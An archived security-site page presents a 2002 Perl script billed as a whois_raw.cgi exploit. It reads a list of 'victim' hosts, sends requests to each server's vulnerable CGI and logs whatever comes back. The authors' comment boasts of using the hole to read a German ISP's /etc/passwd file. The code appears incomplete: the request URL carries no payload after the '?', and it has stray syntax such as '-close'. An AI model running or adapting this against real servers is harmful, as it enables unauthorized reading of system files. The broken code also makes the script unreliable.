what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

whois-ex.pl

whois-ex.pl
Posted Jul 3, 2002
Authored by Lawrence Lavigne, Michelle Welday

This is a perl script that checks for the whois_raw cgi vulnerability. Code ripped from Piffys issscan.pl.

tags | tool, cgi, scanner, perl
systems | unix
SHA-256 | 79a982f5b7207a58334998ccd349d93b3fadbc457f773bd51bd09e4d6b8f8b1a

whois-ex.pl

Change Mirror Download
##########################################################################
# This is a script that checks for the cgi whois_raw vulnerabillity. #
# The idea was inspired after having pulled up an encrypted /etc/passwd #
# file on a German ISP using the /cgi-bin/whois_raw.cgi? vulnerabillity. #
# This code was ripped from iisscan by Piffy. #
##########################################################################

use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;

my $def = new LWP::UserAgent;
my @victim;
my $userresp;

print "\nNeoErudition Technologies\n";
print "Whois_raw cgi exploit\n\n";
print "\nCoded by RatDance\n";
print "Enter Y or N to continue. [Y/N]: ";
while(1) {
chomp($userresp = <STDIN>);
if($userresp eq "Y" || $userresp eq "y" || $userresp eq "yes") {
print "Continueing...\n";
last;
} elsif($userresp eq "N" || $userresp eq "n" || $userresp eq "no") {
print "Exiting as requested.\n";
exit;
} else {
print "Thats not a valid answer. [Y/N]: ";
}
}
print "\nWhat file contains the victim address: ";

chomp(my $victim=<STDIN>);
open(IN, $victim) || die "\nCould not open $victim: $!";
while (<IN>)
{
$victim[$a] = $_;
chomp $victim[$a];
$a++;
$b++;
}
close(IN);
$a = 0;
print "whois raw exploit initiated..\n";
while ($a < $b)
{
my $url="http://$victim[$a]/cgi-bin/whois_raw.cgi? ";
my $request = new HTTP::Request('GET', $url);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>exploit_whois.log");
print OUT "\n$victim[$a] : $response->content";
-close OUT;
} else {
print $response->error_as_HTML;
}
&second()
}

sub second() {
my $url2="http://$victim[$a]/cgi-bin/whois_raw.cgi? ";
my $request = new HTTP::Request('GET', $url2);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>exploit_whois.log");
print OUT "\n$victim[$a] : $response->content";
-close OUT;
} else {
print $response->error_as_HTML;
}
$a++;
}






Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close